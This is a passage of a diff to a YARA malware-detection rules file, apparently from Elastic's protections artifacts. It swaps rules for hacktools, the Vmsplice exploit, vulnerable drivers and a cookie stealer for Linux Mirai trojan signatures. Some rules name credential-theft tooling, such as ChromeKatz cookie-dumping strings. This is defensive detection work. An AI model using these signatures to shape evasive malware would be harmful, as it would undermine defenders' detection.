"66a14c03-f4a3-4b24-a5db-5a9235334e37" + id = "6a77af0f-31fa-4793-82aa-10b065ba1ec0" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Bruteforce.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a2d8e2c34ae95243477820583c0b00dfe3f475811d57ffb95a557a227f94cd55" - logic_hash = "c8b2925c2e3f95e78f117ddd52e208d143d19ee75e9283f7f15d10e930eaac5f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L813-L830" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "7d7623dfc1e16c7c02294607ddf46edd12cdc7d39a2b920d8711dc47c383731b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "255c1a2e781ff7f330c09b3c82f08db110579f77ccef8780d03e9aa3eec86607" + fingerprint = "4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102826,28 +103225,27 @@ rule ELASTIC_Linux_Hacktool_Bruteforce_66A14C03 : FILE MEMORY os = "linux" strings: - $a = { 48 8B 4C 24 08 78 3D 48 8B 44 24 30 48 29 C8 48 89 4D 08 48 89 } + $a = { 31 D1 89 0F 48 83 C7 04 85 F6 7E 3B 44 89 C8 45 89 D1 45 89 C2 41 } condition: all of them } -rule ELASTIC_Linux_Hacktool_Bruteforce_Eb83B6Aa : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_5F7B67B8 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Bruteforce (Linux.Hacktool.Bruteforce)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "eb83b6aa-d7b5-4d10-9258-4bf619fc6582" + id = "5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Bruteforce.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8dec88576f61f37fbaece3c30e71d338c340c8fb9c231f9d7b1c32510d2c3167" - logic_hash = "bc79860e414d07ee8000eea3d61827272d66faa90a8bf6c65fcda90a4bd762ef" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L832-L849" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "b2aedc0361c1093d7a996f26d907da3e4654c32a6dbcdbab441c19d4207f2e2a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7767bf57c57d398f27646f5ae2bcda07d6c62959becb31a5186ff0b027ff02b4" + fingerprint = "6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102855,62 +103253,57 @@ rule ELASTIC_Linux_Hacktool_Bruteforce_Eb83B6Aa : FILE MEMORY os = "linux" strings: - $a = { 10 89 45 EC EB 04 83 6D EC 01 83 7D EC 00 74 12 8B 45 EC 8D } + $a = { 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C } condition: all of them } -rule ELASTIC_Windows_Hacktool_Dinvokerust_512D3B59 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_A3Cedc45 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Dinvokerust (Windows.Hacktool.DinvokeRust)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "512d3b59-6bd3-4716-aa5f-1541044bbf9a" - date = "2024-02-28" - modified = "2024-03-21" + id = "a3cedc45-962d-44b5-bf0e-67166fa6c1a4" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_DinvokeRust.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ebf0f1bfd166d2d49b642fa43cb0c7364c0c605d9a7f108dc49d9f1cc859ab4a" - logic_hash = "7be1a4e25cf41e47ab135c718b7ec5a49a2890cf873c52597f8dab4d47636ed8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L851-L869" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1ae0cd7e5bac967e31771873b4b41a1887abddfcdfcc76fa9149bb2054b03ca4" + logic_hash = "9233e6faa43d8ea43ff3c71ecb5248d5d311b2a593825c299cac4466278cd020" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "0587368dc33b7fee0037be9247daaeaf6846c2b4a839660511ebf5eb0fdfb087" + fingerprint = "8335e540adfeacdf8f45c9cb36b08fea7a06017bb69aa264dc29647e7ca4a541" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $s1 = { 64 69 6E 76 6F 6B 65 ?? ?? 67 65 74 5F } - $s2 = { 64 69 6E 76 6F 6B 65 ?? ?? 6E 74 5F } - $s3 = { 64 69 6E 76 6F 6B 65 ?? ?? 6C 69 74 63 72 79 70 74 } - $s4 = { 64 69 6E 76 6F 6B 65 5C 73 72 63 5C 6C 69 62 2E 72 73 } - $s5 = { 75 6E 77 69 6E 64 65 72 ?? ?? 63 61 6C 6C 5F 66 75 6E 63 74 69 6F 6E } - $s6 = { 75 6E 77 69 6E 64 65 72 ?? ?? 69 6E 64 69 72 65 63 74 5F 73 79 73 63 61 6C 6C } + $a = { 74 2C 48 8B 03 48 83 E0 FE 48 29 C3 48 8B 43 08 48 83 E0 FE 4A 8D } condition: - 2 of them + all of them } -rule ELASTIC_Linux_Cryptominer_Bscope_348B7Fa0 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_7D05725E : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Bscope (Linux.Cryptominer.Bscope)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "348b7fa0-e226-4350-8697-345ae39fa0f6" + id = "7d05725e-db59-42a7-99aa-99de79728126" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Bscope.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a6fb80d77986e00a6b861585bd4e573a927e970fb0061bf5516f83400ad7c0db" - logic_hash = "bc6a59dcc36676273c61fa71231fd8709884beebb7ab64b58f22551393b20c71" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L871-L889" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb" + logic_hash = "ac2d0b81325ce7984bc09f93e61b42c8e312a31c75f09d37313d70cd40d3cf8b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "caae9d3938f9269f8bc30e4837021513ca6e4e2edd1117d235b0d25474df5357" + fingerprint = "7fcd34cb7c37836a1fa8eb9375a80da01bda0e98c568422255d83c840acc0714" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102918,59 +103311,56 @@ rule ELASTIC_Linux_Cryptominer_Bscope_348B7Fa0 : FILE MEMORY os = "linux" strings: - $a = { 04 8B 00 03 45 C0 89 02 8B 45 08 8D 50 08 8B 45 08 83 C0 08 } + $a = { 24 97 00 00 00 89 6C 24 08 89 74 24 04 89 14 24 0F B7 C0 89 44 } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Procexp_Aeb4E5C0 : FILE +rule ELASTIC_Linux_Trojan_Mirai_Fa48B592 : FILE MEMORY { meta: - description = "Name: procexp.Sys, Version: 16.65535.65535.65535" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "aeb4e5c0-5ed5-4ecf-95a5-a741c105f02f" - date = "2022-04-04" - modified = "2022-10-26" + id = "fa48b592-8d80-45af-a3e4-232695b8f5dd" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_ProcExp.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c" - logic_hash = "827bb2efb6d3442233f81e87a42a3f5ee5caaeadc459070c6d347c6515866c93" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L891-L909" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee" + logic_hash = "5648bcc96b1fdd1529b4b8765b1738594d0d61f7880b763e803cd89bd117e96b" score = 75 quality = 75 - tags = "FILE" - fingerprint = "b06d9e07aebfe4acadb717f7a8534feb6863b0649cd10fbbf9b53587a855ea01" - threat_name = "Windows.VulnDriver.ProcExp" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 70 00 72 00 6F 00 63 00 65 00 78 00 70 00 2E 00 53 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\xff][\x00-\xff])([\x00-\x10][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\xff][\x00-\xff])([\x00-\x0f][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\xfe][\x00-\xff])([\x00-\x10][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\xff][\x00-\xff])([\x00-\x10][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xfe][\x00-\xff]))/ + $a = { 31 C0 BA 01 00 00 00 B9 01 00 00 00 03 04 24 89 D7 31 D2 F7 F7 0F } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Linux_Trojan_Xpmmap_7Dcc3534 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_B9A9D04B : FILE MEMORY { meta: - description = "Detects Linux Trojan Xpmmap (Linux.Trojan.Xpmmap)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "7dcc3534-e94c-4c92-ac9b-a82b00fb045b" - date = "2021-04-06" + id = "b9a9d04b-a997-46c4-b893-e89a3813efd3" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xpmmap.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "765546a981921187a4a2bed9904fbc2ccb2a5876e0d45c72e79f04a517c1bda3" - logic_hash = "f88cc0f02797651e8cdf8e25b67a92f7825ec616b79df21daae798b613baf334" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L911-L928" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "61575576be4c1991bc381965a40e5d9d751bba2680a42907b0148651716419fc" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "397618543390fb8fd8b198f63034fe88b640408d75b769fb337433138dafcf66" + fingerprint = "874249d8ad391be97466c0259ae020cc0564788a6770bb0f07dd0653721f48b1" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102978,66 +103368,57 @@ rule ELASTIC_Linux_Trojan_Xpmmap_7Dcc3534 : FILE MEMORY os = "linux" strings: - $a = { 48 89 45 F8 48 83 7D F8 FF 75 14 BF 10 0C 40 00 } + $a = "nexuszetaisacrackaddict" condition: all of them } -rule ELASTIC_Windows_Hacktool_Chromekatz_Fa232Bba : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_D2205527 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Chromekatz (Windows.Hacktool.ChromeKatz)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "fa232bba-07dd-45e0-9ca3-b1465eb9616d" - date = "2024-03-27" - modified = "2024-05-08" + id = "d2205527-0545-462b-b3c9-3bf2bdc44c6c" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_ChromeKatz.yar#L1-L28" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3f6922049422df14f1a1777001fea54b18fbfb0a4b03c4ee27786bfbc3b8ab87" - logic_hash = "c86291fadd51845cbd7428b159e401d78ac77090e14e34d06bf7bf2018f4502a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L930-L948" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e4f584d1f75f0d7c98b325adc55025304d55907e8eb77b328c007600180d6f06" + logic_hash = "172ba256873cce61047a5198733cacaff4ef343c9cbd76f2fbbf0e1ed8003236" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bf1da659e0de9c4e22851e77878066ae5f4aca75e61b35392887c12e125c91f8" + fingerprint = "01d937fe8823e5f4764dea9dfe2d8d789187dcd6592413ea48e13f41943d67fd" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $s1 = "CookieKatz.exe" - $s2 = "Targeting Chrome" - $s3 = "Targeting Msedgewebview2" - $s4 = "Failed to find the first pattern" - $s5 = "WalkCookieMap" - $s6 = "Found CookieMonster on 0x%p" - $s7 = "Cookie Key:" - $s8 = "Failed to read cookie value" wide - $s9 = "Failed to read cookie struct" wide - $s10 = "Error reading left node" + $a = { CA B8 37 00 00 00 0F 05 48 3D 01 F0 FF FF 73 01 C3 48 C7 C1 C0 FF } condition: - 5 of them + all of them } -rule ELASTIC_Linux_Exploit_Vmsplice_Cfa94001 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Ab073861 : FILE MEMORY { meta: - description = "Detects Linux Exploit Vmsplice (Linux.Exploit.Vmsplice)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "cfa94001-6000-4633-9af2-efabfaa96f94" + id = "ab073861-38df-4a39-ab81-8451b6fab30c" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Vmsplice.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0a26e67692605253819c489cd4793a57e86089d50150124394c30a8801bf33e6" - logic_hash = "b5a86a79384997f977d353371ccaa8c736f5c24af40b85a24076d4c4fb79a237" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L950-L968" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "175444a9c9ca78565de4b2eabe341f51b55e59dec00090574ee0f1875422cbac" + logic_hash = "251b92c4fec9d113025c6869c279247a3dd16ee094c8861fe43a33f87132bf75" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3fb484112484e2afc04a88d50326312af950605c61f258651479427b7bae300a" + fingerprint = "37ab5e3ccc9a91c885bff2b1b612efbde06999e83ff5c5cd330bd3a709a831f5" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103045,28 +103426,27 @@ rule ELASTIC_Linux_Exploit_Vmsplice_Cfa94001 : FILE MEMORY os = "linux" strings: - $a = { 7A 00 21 40 23 24 00 6D 6D 61 70 00 5B 2B 5D 20 6D 6D 61 70 3A } + $a = { AC 00 00 00 54 60 00 00 50 E8 4E 0C 00 00 EB 0E 5A 58 59 97 60 8A 54 } condition: all of them } -rule ELASTIC_Linux_Exploit_Vmsplice_A000F267 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_637F2C04 : FILE MEMORY { meta: - description = "Detects Linux Exploit Vmsplice (Linux.Exploit.Vmsplice)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "a000f267-b4d7-46e9-ab61-818633083ba2" + id = "637f2c04-98e4-45aa-b60a-14a96c6cebb7" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Vmsplice.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c85cc6768a28fb7de16f1cad8d3c69d8f0b4aa01e00c8e48759d27092747ca6f" - logic_hash = "2a8cb11bb21f2ce620a6fa1f0fb932bef60a479fac836058ec4e8c760b5d60f9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L970-L987" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "cff4aa6c613ccc64f64441f7e40f79d3a22b5c12856c32814545bd41d5f112bd" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0753ef1bc3e151fd6d4773967b5cde6ad789df593e7d8b9ed08052151a1a1849" + fingerprint = "7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103074,28 +103454,27 @@ rule ELASTIC_Linux_Exploit_Vmsplice_A000F267 : FILE MEMORY os = "linux" strings: - $a = { 24 04 73 00 00 00 89 44 24 00 CF 83 C4 10 5B C9 C3 55 89 E5 83 } + $a = { 10 48 8B 45 E0 0F B6 00 38 C2 0F 95 C0 48 FF 45 E8 48 FF 45 E0 } condition: all of them } -rule ELASTIC_Linux_Exploit_Vmsplice_8B9E4F9F : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Aa39Fb02 : FILE MEMORY { meta: - description = "Detects Linux Exploit Vmsplice (Linux.Exploit.Vmsplice)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "8b9e4f9f-7903-4aa5-9098-766f4311a22b" - date = "2021-04-06" + id = "aa39fb02-ca7e-4809-ab5d-00e92763f7ec" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Vmsplice.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0230c81ba747e588cd9b6113df6e1867dcabf9d8ada0c1921d1bffa9c1b9c75d" - logic_hash = "6979a900a2532a8da36711f3ffe13f71ec4efa7771aa2feec9391bd031aaa023" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L989-L1006" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "ffa95d92a2b619008bd5918cd34a17cd034b2830dc09d495db4b0c397b1cb53a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "585b16ad3e4489a17610f0a226be428def33e411886f273d0c1db45b3819ba3f" + fingerprint = "b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103103,28 +103482,28 @@ rule ELASTIC_Linux_Exploit_Vmsplice_8B9E4F9F : FILE MEMORY os = "linux" strings: - $a = { 00 00 00 00 20 4C 69 6E 75 78 20 76 6D 73 70 6C } + $a = { 74 DE 8D 40 F1 3C 01 76 D7 80 FA 38 74 D2 80 FA 0A 74 CD 80 } condition: all of them } -rule ELASTIC_Linux_Exploit_Vmsplice_055F88B8 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_0Bce98A2 : FILE MEMORY { meta: - description = "Detects Linux Exploit Vmsplice (Linux.Exploit.Vmsplice)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "055f88b8-b1b0-4b02-8fc5-97804b564d27" - date = "2021-04-06" + id = "0bce98a2-113e-41e1-95c9-9e1852b26142" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Vmsplice.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "607c8c5edc8cbbd79a40ce4a0eccf46e01447985d9415d1eff6a91bf64074507" - logic_hash = "29e59bb372f0b37b507c72e5b5bcb27ba0fa2aaac71ea77f0cab85af31708c8a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1008-L1026" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80" + logic_hash = "04d10ef03c178fb101d3c6b6d3b36f0aa04149b9b35a33c3d10d17af1fc07625" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "38f7d6c56ee1cd465062b5c82320710c4d0393a3b33f5586b6c0c0c778e5d3b2" + fingerprint = "993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103132,227 +103511,198 @@ rule ELASTIC_Linux_Exploit_Vmsplice_055F88B8 : FILE MEMORY os = "linux" strings: - $a = { 2D 2D 2D 00 20 4C 69 6E 75 78 20 76 6D 73 70 6C } + $a = { 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A } condition: all of them } -rule ELASTIC_Linux_Exploit_Vmsplice_431E689D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_3A56423B : FILE MEMORY { meta: - description = "Detects Linux Exploit Vmsplice (Linux.Exploit.Vmsplice)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "431e689d-0c41-4c92-98b0-0dac529d8328" - date = "2021-06-28" + id = "3a56423b-c0cf-4483-87e3-552beb40563a" + date = "2021-01-12" modified = "2021-09-16" - reference = "1cbb09223f16af4cd13545d72dbeeb996900535b1e279e4bcf447670728de1e1" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Vmsplice.yar#L81-L99" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "5b9a7ffcd6fc6893a8224fd2b9ca59f4cff6086669a73190114db510a1ad9ff2" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1028-L1045" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "0c2765a5c1b331eb9ff5e542bc72eff7be3506e6caef94128413d500086715c6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1e8aee445a3adef6ccbd2d25f7b38202bef98a99b828eda56fb8b9269b6316b4" - severity = "100" + fingerprint = "117d6eb47f000c9d475119ca0e6a1b49a91bbbece858758aaa3d7f30d0777d75" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { 69 6F 6E 00 70 75 74 65 6E 76 00 73 74 64 6F 75 74 00 73 65 } + $a = { 24 1C 8B 44 24 20 0F B6 D0 C1 E8 08 89 54 24 24 89 44 24 20 BA 01 00 } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Eneio_6E01882F : FILE +rule ELASTIC_Linux_Trojan_Mirai_D18B3463 : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Eneio (Windows.VulnDriver.EneIo)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "6e01882f-8394-4e32-8049-fa9c4588b087" - date = "2022-04-04" - modified = "2022-04-04" + id = "d18b3463-1b5e-49e1-9ae8-1d63a10a1ccc" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_EneIo.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347" - logic_hash = "144ac5375cb637b6301a2275f2412fbd0d0c5fb23105c7cce5aa7912cf68fa2c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1047-L1065" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cd86534d709877ec737ceb016b2a5889d2e3562ffa45a278bc615838c2e9ebc3" + logic_hash = "f906c6f9baae6d6fa3f42e84607549bae44ed9ca847fd916d04f2671eef1caa1" score = 75 quality = 75 - tags = "FILE" - fingerprint = "8077212bfbadc7f47f2eb76f123a6e4bcda12009293cb975bbeaba77f8c9dcd0" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "4b3d3bb65db2cdb768d91c50928081780f206208e952c74f191d8bc481ce19c6" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "\\Release\\EneIo.pdb" + $a = { DF 77 95 8D 42 FA 3C 01 76 8E 80 FA 0B 74 89 80 FA 15 74 84 80 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Hacktool_Phant0M_2D6F9B57 : FILE MEMORY +rule 